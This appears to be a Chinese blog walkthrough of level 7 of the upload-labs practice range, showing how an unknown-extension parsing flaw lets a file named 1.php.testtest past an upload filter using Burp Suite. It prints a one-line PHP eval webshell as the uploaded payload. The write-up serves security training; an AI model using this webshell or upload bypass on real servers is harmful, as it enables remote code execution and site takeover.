upload-labs靶场未知后缀名解析漏洞

upload-labs靶场未知后缀名解析漏洞

版本影响:

phpstudy 版本:5.2.17

1 环境搭建

1.1 在线靶场下载,解压到phpstudy的www目录下,即可使用
复制代码
https://github.com/c0ny1/upload-labs
1.2 已启动:访问端口9000,端口自设,打开页面选择第七关
复制代码
http://192.168.225.194:9000/upload_labs/

2 漏洞复现

2.1 上传1.php文件,文件内容如下,显示上传错误,使用bp上传
复制代码
<?php @eval($_REQUEST[777]);phpinfo();?>
2.2 使用bp转发

修改php后缀和文件内容类型,进行转发,返回信息提示上传成功

访问不能执行

结论php可以上传,php的不能上传,做了黑白名单策略,验证使用白名单或者是黑名单,随便给个后缀testtest

上传1.php.testtest成功

相关推荐
神仙别闹44 分钟前
基于 Matlab 和 Truetime 的网络控制系统仿真
网络·matlab·php
Johny_Zhao18 小时前
CentOS Stream 8 高可用 Kuboard 部署方案
linux·网络·python·网络安全·docker·信息安全·kubernetes·云计算·shell·yum源·系统运维·kuboard
机灵小和尚21 小时前
腾讯云 Teo H5直传CDN空间
后端·云计算·php·腾讯云·html5
Joomla中文网1 天前
joomla5去掉后台PHP版本警告信息
开发语言·php
杰_happy1 天前
PHP Swoft2 框架精华系列:Config 配置解析,使用说明
开发语言·php
YakProject1 天前
用 IRify 深入探索 WebShell 中的 Source/Sink 挖掘
网络安全
白山云北诗1 天前
深度解读云防火墙(WAF):守护网络安全的智能卫士
安全·web安全·防火墙·waf·云防火墙·web应用防火墙
douluo9981 天前
老飞飞bug及原理修复方法
安全·web安全
忘川w2 天前
《网络安全与防护》知识点复习
笔记·安全·web安全·网络安全
Bruce_Liuxiaowei2 天前
使用Nmap探测VNC服务信息—某单位KVM设备
网络·安全·web安全